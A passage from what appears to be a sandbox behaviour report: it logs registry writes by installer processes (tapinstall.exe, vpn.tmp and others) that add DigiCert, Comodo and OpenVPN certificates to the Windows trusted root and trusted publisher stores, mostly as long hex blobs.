c7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c	app.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d4304000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	file.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 0f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d432000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0f00000001000000140000001b4e387db74a69a0470cb08f598beb3b511617530300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e717145ef04d047ef2824532ee8a363d6b8fda58b639832f07eccba53b0446715d150e886195607af12d04e77a0f90bca14e70a782603b0ee5b9dca6cf43d5befb9887c54a3a507a82c7dd4a3fec3aed83171ff020b0c1ca50b87751a597b13454a31bd07796eea97ee55631a43d92cbc7275dfc6da478de5f3c8e2c3431db592d2410de2e789465cf73498df4e042aaa085855603e5165b84e25f27c6d29f77a1cc7bf2875da81395715c662b0333b025b37fcac7bd2f3b50a497613d972182c25e796e0dc453264c6e5340bd4962d5d3d37db06dfc03efb0ba8215b9ef2ef52c15d369db3a732259d286a9aa761ccafff0558c8efdab678d785cfe370203010001a38201f1308201ed301f0603551d230418301680148fe87ef06d326a000523c770976a3a90ff6bead4301d0603551d0e041604149bb182bc8ec73483e7d3569d57448488d1803437302e0603551d1104273025a02306082b06010505070803a01730150c1355532d44454c41574152452d33373631323536300e0603551d0f0101ff04040302078030130603551d25040c300a06082b06010505070303307b0603551d1f047430723037a035a0338631687474703a2f2f63726c332e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c3037a035a0338631687474703a2f2f63726c342e64696769636572742e636f6d2f4556436f64655369676e696e67534841322d67312e63726c304b0603551d2004443042303706096086480186fd6c0302302a302806082b06010505070201161c68747470733a2f2f7777772e64696769636572742e636f6d2f4350533007060567810c0103307e06082b0601050507010104723070302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304806082b06010505073002863c687474703a2f2f636163657274732e64696769636572742e636f6d2f44696769436572744556436f64655369676e696e6743412d534841322e637274300c0603551d130101ff04023000300d06092a864886f70d01010b050003820101006c24a9a7e30a7db2301b344f60cd1b1daf32fce4207ff625bd635f062f8a65301a7d66fade8ba809d0863421631692ef527119eaed4d1f012a98606727c8682aaf1099ca03ab9e996184f4186bce0ca7739c9e6e7144972012ac6eb4ac7db2122b244546f09647fa477a0613401f42e72f4a56fd687d946c4a41e1d1238fe8959e0b6e0cb692e92d96ccc7bde669843c60a374d001608328688790f65ababb20c78c59dad5b32bd79d67c60341c754eae510e08f897e6190c3af2d171261bcea2905545682ace869cd7cc3e66e635dd4f6420dcdc0909b780456523f685aec28b7a5585fae78f36ae3b84d0690f5ee0aa522245546508b2fadb6975f6082d11f	vpn.tmp
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c00000001000000040000000008000004000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 0f00000001000000200000002dc1a6a6cb0cb42f7e0d2c56f38bc7decbccd143405f669070ce130f9249ba48030000000100000014000000cbc64d0fc770b1694df723bb18b5679ce09b61ca20000000010000000c06000030820608308204f0a00302010202100ebd24bdfbd4adddd2edd27e8fb1953c300d06092a864886f70d01010b0500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b302906035504031322446967694365727420455620436f6465205369676e696e6720434120285348413229301e170d3136303230393030303030305a170d3139303231333132303030305a3082011d311d301b060355040f0c1450726976617465204f7267616e697a6174696f6e31133011060b2b0601040182373c0201031302555331193017060b2b0601040182373c020102130844656c61776172653110300e06035504051307333736313235363129302706035504091320353938302053746f6e6572696467652044726976652c20537569746520313033310e300c060355041113053934353838310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100dbfa60e71